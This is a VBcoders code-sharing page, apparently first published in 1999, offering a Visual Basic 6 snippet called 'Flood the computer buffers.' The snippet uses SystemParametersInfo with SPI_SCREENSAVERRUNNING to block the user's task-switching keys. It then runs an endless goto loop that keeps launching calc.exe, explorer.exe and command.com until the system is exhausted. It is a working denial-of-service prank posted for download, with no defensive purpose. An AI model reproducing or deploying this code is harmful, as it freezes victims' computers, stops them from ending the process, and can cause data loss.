VBcoders Guest



Don't have an account yet? Register
 


Forgot Password?



Flood the computer buffers.

by Python (1 Submission)
Category: Miscellaneous
Compatability: VB 6.0
Difficulty: Unknown Difficulty
Originally Published: Thu 5th August 1999
Date Added: Mon 8th February 2021
Rating: (1 Votes)

Flood the computer buffers.

Rate Flood the computer buffers.



Dim Ret  As Long
Dim pOld As Boolean
Ret = SystemParametersInfo(SPI_SCREENSAVERRUNNING, True, pOld, 0)
repeat:
call shell("c:\windows\calc.exe")
call shell("c:\windows\explorer.exe")
call shell("c:\command.com")
goto repeat
end sub

Download this snippet    Add to My Saved Code

Flood the computer buffers. Comments

No comments have been posted about Flood the computer buffers.. Why not be the first to post a comment about Flood the computer buffers..

Post your comment

Subject:
Message:
0/1000 characters